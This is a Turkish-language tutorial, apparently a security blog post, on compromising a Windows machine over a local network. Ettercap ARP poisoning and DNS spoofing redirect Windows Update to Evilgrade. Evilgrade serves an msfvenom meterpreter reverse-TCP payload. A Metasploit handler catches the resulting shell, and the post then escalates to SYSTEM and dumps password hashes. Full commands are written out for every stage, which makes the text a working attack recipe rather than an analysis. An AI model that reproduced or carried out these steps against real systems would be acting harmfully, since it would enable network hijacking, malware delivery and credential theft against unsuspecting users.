Evilgrade & Ettercap ile Windows Update Özelliğinin Kötüye Kullanılarak Windows İşletim Sisteminin Ele Geçirilmesi

Uygun şekilde yapılandırılmamış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Bu yazıda, Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilecektir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olacaktır.

DNS zehirlenmesi ve Windows güncelleştirme özelliğinin kötüye kullanılarak Windows işletim sisteminin ele geçirilme işlemi 7 adımda incelenecektir:

  1. Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
  2. Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
  3. “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
  4. Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
  5. Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
  6. Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
  7. Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

 

1) Erişimlerin Kontrolü

Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-01

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-02

 

2) Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi

Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-03

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır.

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-04

Modüllerin yüklenmesi beklenir:

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-05

Diğer EvilGrade kurulum metodları için bakınız.

Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.

show modules

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-06

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:

configure winupdate
show options

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-07

Not: Betik büyük/küçük harf duyarlıdır.

Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

 

3) “winupdate” Modülünün ve İlgili Kaynakların Ayarlanması

winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

  • VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-08

  • Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:

which msfvenom
ls -la /usr/local/bin/msfvenom

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-09

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.

set agent ‘[“/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe 1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>”]’

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-10

 

4) Ettercap ile DNS Spoofing İşleminin Başlatılması

Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).

ettercap -G
Sniff > Unified Sniffing

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-11

Seçilen adaptörün dinleme modunda olduğu görülmektedir.

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-12

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:

Plugins > Manage the plugins
dns_spoof

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-13

Erişim sağlanabilen sistemler taranır (CTRL + S).

Hosts > Scan for hosts

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-14

Tarama sonucunda tespit edilen sistemler listelenebilir (H):

Hosts > Hosts list

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-15

Tespit edilen sistemlere Arp zehirlemesi yapılır.

Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-16

Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-17

Dinleme işlemi başlatılır (CTRL +W).

Start > Start Sniffing

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-18

İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-19

 

5) Saldırganın Kurban Bilgisayarı Dinlemesi

Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurduğunda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-20

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

exploit

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-21

 

6) Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması

Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-22

İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.

Ettercap’in DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-23

Kurban zararlı yazılımı masaüstüne kaydeder:

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-24

Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-25

 

7) Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması

Kurban masaüstündeki zararlı yazılımı çalıştırır.

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-26

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-27

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:

ps

obtaining-meterpreter-session-on-windows-machine-by exploiting-windows-update-via-evilgrade-and-ettercap-28

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:

migrate 1124
getuid
hashdump

obtaining-meterpreter-session-on-windows-machine-by-exploiting-windows-update-via-linux-evilgrade-tool-and-linux-ettercap-tool-29

 

Kaynaklar:

http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.